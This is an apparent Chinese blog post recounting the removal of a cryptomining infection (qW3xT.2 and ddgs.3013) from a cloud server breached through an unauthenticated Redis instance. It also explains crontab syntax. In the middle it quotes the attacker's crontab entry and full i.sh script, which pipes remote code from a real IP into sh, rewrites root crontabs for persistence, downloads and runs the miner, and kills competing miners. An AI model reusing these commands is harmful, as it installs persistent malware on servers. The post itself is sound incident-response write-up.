解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵)
在阿里云使用redis,開啟了6379端口,但是當時并沒有對redis的密碼進行設置。
在晚上一點左右。阿里云給我發短信,告訴我服務器出現緊急安全事件。建議登錄云盾-態勢感知控制臺查看詳情和處理。
于是早上開啟電腦,連接服務器,使用top查看cpu狀態。結果顯示進程占用cpu99%以上。
在網上百度,了解到qW3xT.2是一個挖礦病毒。也就是說別人利用你的電腦挖礦。謀取利益。
解決辦法:
1、首先解決redis入口問題,因為最開始沒有設置密碼,所以首先修改redis.conf。設置密碼,然后重啟redis
2、進入/tmp文件夾下。發現qW3xT.2文件,刪除。之后kill掉qW3xT.2該進程,但是一段時間之后,發現該行程又重新啟動。
肯定是有守護進程,觀察top命令下的進程,發現一個可疑的進行
3、在/tmp文件夾下發現該進程的文件 ls /tmp
發現qW3xT.2文件又重新生成了。這時,首先刪除qW3xT.2文件和ddgs.3013文件,然后使用top查詢qW3xT.2和ddgs.3013的pid,直接kill掉。
4、一段時間之后,刪除的文件重新生成,dds和挖礦的進程又重新執行。此時懷疑是否有計劃任務,此時查看計劃任務的列表
[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
刪除計劃任務?crontab -r
curl 的這幾個 optional 介紹,我也是百度的
-f ?- fail在HTTP錯誤(H)上靜默失敗(根本沒有輸出)
-s ?-silent靜音模式。 不要輸出任何東西
??????--socks4 HOST [:PORT]給定主機+端口上的SOCKS4代理
??????--socks4a HOST [:PORT]給定主機+端口上的SOCKS4a代理
??????--socks5 HOST [:PORT]給定主機+端口上的SOCKS5代理
??????--socks5-hostname HOST [:PORT] SOCKS5代理,將主機名傳遞給代理
??????--socks5-gssapi-service名稱為gssapi的SOCKS5代理服務名稱
??????--socks5-gssapi-nec與NEC SOCKS5服務器的兼容性
-S ??--show-error顯示錯誤。 使用-s時,make curl會在出現錯誤時顯示錯誤
-L ??--location遵循重定向(H)
??????--location-trusted like --location并將auth發送給其他主機(H)
?
此時計劃任務已經刪除。詳細信息查看https://juejin.im/post/5b62b975f265da0f9628a820。
計劃任務刪除完成之后,這個13又開始運行。太頑固了。
?
于是我又看計劃任務的內容,是否是有東西沒有刪除干凈。
[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
????
????curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
?
發現計劃任務在服務器中創建了幾個文件,
/var/spool/cron/crontabs/root
/var/spool/cron/root
內容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(與計劃任務相同)
將計劃任務中創建的文件刪除。
最終,這個挖礦病毒終于刪除完成
crontab命令解釋
*/5 * * * * Command ??????????????????????每5分鐘執行一次命令
5 * * * * Command ????????????????????????每小時的第5分鐘執行一次命令
30 18 * * * Command?????????????????????指定每天下午的 6:30 執行一次命令?
30 7 8 * * Command??????????????????????指定每月8號的7:30分執行一次命令?
30 5 8 6 * Command?????????????????????指定每年的6月8日5:30執行一次命令?
30 6 * * 0 Command??????????????????????指定每星期日的6:30執行一次命令
設置定時任務:echo '*/1 * * * * root echo "123" >> /tmp/1.txt' > /etc/crontab
查看用戶定時任務:crontab -l
編輯用戶定時任務:crontab -e
路徑存放處:
- /etc/crontab
- /var/spool/cron/root
- /var/spool/cron/crontabs/root
總結
以上是生活随笔為你收集整理的解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Linux查看二进制文件hexedito
- 下一篇: 工业控制系统ICS网络安全简析